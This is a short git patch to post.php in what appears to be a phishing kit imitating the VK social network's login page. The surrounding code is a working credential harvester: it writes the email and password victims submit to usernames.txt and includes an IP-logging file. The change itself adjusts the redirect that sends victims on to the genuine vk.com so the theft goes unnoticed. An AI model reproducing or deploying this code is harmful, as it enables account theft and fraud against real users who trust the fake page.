From 3cbb7c6e3ba176bdc3b894015ceb72b2a4721aa0 Mon Sep 17 00:00:00 2001 From: Alexey Mozzhakov Date: Thu, 28 Jun 2018 10:21:46 +0300 Subject: [PATCH] Changed post to redirect to desktop version (mobile devices will still be redirected to m.vk.com by vk) --- WebPages/VK/post.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/WebPages/VK/post.php b/WebPages/VK/post.php index 3b35aca..c6054ff 100644 --- a/WebPages/VK/post.php +++ b/WebPages/VK/post.php @@ -2,5 +2,5 @@ include 'ip.php'; file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND); -header('Location: https://m.vk.com'); +header('Location: https://vk.com'); exit();